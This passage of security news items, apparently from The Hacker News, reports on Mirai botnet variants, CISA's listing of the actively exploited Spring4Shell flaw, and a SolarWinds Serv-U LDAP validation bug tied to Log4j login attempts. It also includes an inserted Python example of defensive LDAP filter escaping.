To make matters worse, the leak of Mirai's source code in October 2016 has given birth to numerous variants such as Okiru, Satori, Masuta, and Reaper, making it an ever-mutating threat.

Earlier this January, cybersecurity firm CrowdStrike noted that malware hitting Linux systems increased by 35% in 2021 compared to 2020, with XOR DDoS, Mirai, and Mozi malware families accounting for more than 22% of Linux-targeted threats observed in the year.

"The primary purpose of these malware families is to compromise vulnerable internet-connected devices, amass them into botnets, and use them to perform distributed denial-of-service (DDoS) attacks," the researchers said.


CISA Warns of Active Exploitation of Critical Spring4Shell Vulnerability
5.4.22  Exploit  
Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added the recently disclosed remote code execution (RCE) vulnerability affecting the Spring Framework, to its Known Exploited Vulnerabilities Catalog based on "evidence of active exploitation."

The critical severity flaw, assigned the identifier CVE-2022-22965 (CVSS score: 9.8) and dubbed "Spring4Shell", impacts Spring model–view–controller (MVC) and Spring WebFlux applications running on Java Development Kit 9 and later.

"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application," Praetorian researchers Anthony Weems and Dallas Kaman noted last week.

Although exact details of in-the-wild abuse remain unclear, information security company SecurityScorecard said "active scanning for this vulnerability has been observed coming from the usual suspects like Russian and Chinese IP space."

Similar scanning activities have been spotted by Akamai and Palo Alto Networks' Unit42, with the attempts leading to the deployment of a web shell for backdoor access and to execute arbitrary commands on the server with the goal of delivering other malware or spreading within the target network.

According to statistics released by Sonatype, potentially vulnerable versions of the Spring Framework account for 81% of the total downloads from Maven Central repository since the issue came to light on March 31.

Cisco, which is actively investigating its line-up to determine which of them may be impacted by the vulnerability, confirmed that three of its products are affected -

Cisco Crosswork Optimization Engine
Cisco Crosswork Zero Touch Provisioning (ZTP), and
Cisco Edge Intelligence
VMware, for its part, also has deemed three of its products as vulnerable, offering patches and workarounds where applicable -

VMware Tanzu Application Service for VMs
VMware Tanzu Operations Manager, and
VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)
"A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system," VMware said in the advisory.

Also added by CISA to the catalog are two zero-day flaws patched by Apple last week (CVE-2022-22674 and CVE-2022-22675) and a critical shortcoming in D-Link routers (CVE-2021-45382) that has been actively weaponized by the Beastmode Mirai-based DDoS campaign.

Pursuant to the Binding Operational Directive (BOD) issued by CISA in November 2021, Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by April 25, 2022.


Microsoft: Hackers Exploiting New SolarWinds Serv-U Bug Related to Log4j Attacks
21.1.2022  Exploit  
Thehackernews

Microsoft on Wednesday disclosed details of a new security vulnerability in SolarWinds Serv-U software that it said was being weaponized by threat actors to propagate attacks leveraging the Log4j flaws to compromise targets.

Tracked as CVE-2021-35247 (CVSS score: 5.3), the issue is an "input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation," Microsoft Threat Intelligence Center (MSTIC) said.

The flaw, which was discovered by security researcher Jonathan Bar Or, affects Serv-U versions 15.2.5 and prior, and has been addressed in Serv-U version 15.3.

"The Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized," SolarWinds said in an advisory, adding it "updated the input mechanism to perform additional validation and sanitization."

The IT management software maker also pointed out that "no downstream effect has been detected as the LDAP servers ignored improper characters." It's not immediately clear if the attacks detected by Microsoft were mere attempts to exploit the flaw or if they were ultimately successful.
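The SolarWinds advisory quoted above describes the general fix for this class of bug: characters that carry meaning in an LDAP search filter must be escaped before a login name is embedded in one. The block below is an added illustration, not Serv-U or Microsoft code, of that escaping as specified in RFC 4515 section 3, together with a check a reviewer can run to confirm a generated filter still consists of exactly one assertion. The attribute name and the login-screen filter shape are assumptions for the example.

```python
import re

# Characters with special meaning in an LDAP filter value and their
# RFC 4515 escape sequences (backslash first so it is not double-escaped).
_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape a string for use as an assertion value inside an LDAP filter."""
    out = []
    for ch in value:
        if ch in _ESCAPES:
            out.append(_ESCAPES[ch])
        elif ord(ch) > 0x7F:
            # Non-ASCII characters are escaped byte-wise as UTF-8 hex pairs.
            out.append("".join(r"\%02x" % b for b in ch.encode("utf-8")))
        else:
            out.append(ch)
    return "".join(out)


def build_login_filter(username: str, uid_attr: str = "sAMAccountName") -> str:
    """Filter a login screen would use to look up the account (assumed shape)."""
    return f"({uid_attr}={escape_filter_value(username)})"


# Exactly one "(attr=value)" where the value contains no unescaped
# filter metacharacters; anything else means user input altered the filter.
_SINGLE_ASSERTION = re.compile(r"^\([A-Za-z][A-Za-z0-9.;-]*=(?:[^()*\\]|\\[0-9a-fA-F]{2})*\)$")


def is_single_assertion(filter_str: str) -> bool:
    """Check that a generated filter is one equality assertion and nothing more."""
    return _SINGLE_ASSERTION.fullmatch(filter_str) is not None


if __name__ == "__main__":
    for name in ("j.doe", "a*b", "(x)", "\\", "éric"):
        f = build_login_filter(name)
        print(f"{name!r:10} -> {f}  single_assertion={is_single_assertion(f)}")
```

A filter built by plain string concatenation would fail is_single_assertion as soon as the login name contained parentheses or a wildcard; routing every user-supplied value through escape_filter_value keeps such characters literal, which is the behaviour the advisory's "additional validation and sanitization" refers to.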

Log4j Attacks
The development comes as multiple threat actors continue to take advantage of the Log4Shell flaws to mass scan and infiltrate vulnerable networks for deploying backdoors, coin miners, ransomware, and remote shells that grant persistent access for further post-exploitation activity.

Akamai researchers, in an analysis published this week, also found evidence of the flaws being abused to infect and assist in the proliferation of malware used by the Mirai botnet by targeting Zyxel networking devices.

On top of this, a China-based hacking group has been previously observed exploiting a critical security vulnerability affecting SolarWinds Serv-U (CVE-2021-35211) to install malicious programs on the infected machines.

Update: In a statement shared with The Hacker News, SolarWinds pointed out that its Serv-U software wasn't exploited in the Log4j attacks, and that attempts were made to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j flaws.

"The activity Microsoft was referring to in their report was related to a threat actor attempting to login to Serv-U using the Log4j vulnerability but that attempt failed as Serv-U does not utilize Log4j code and the target for authentication LDAP (Microsoft Active Directory) is not susceptible to Log4J attacks," a company spokesperson said.

This directly contradicts Microsoft's original disclosure that attackers were exploiting the previously undisclosed vulnerability in the SolarWinds Serv-U file-sharing software to propagate Log4j attacks. We have reached out to Microsoft for further comment, and we will update the story if we hear back.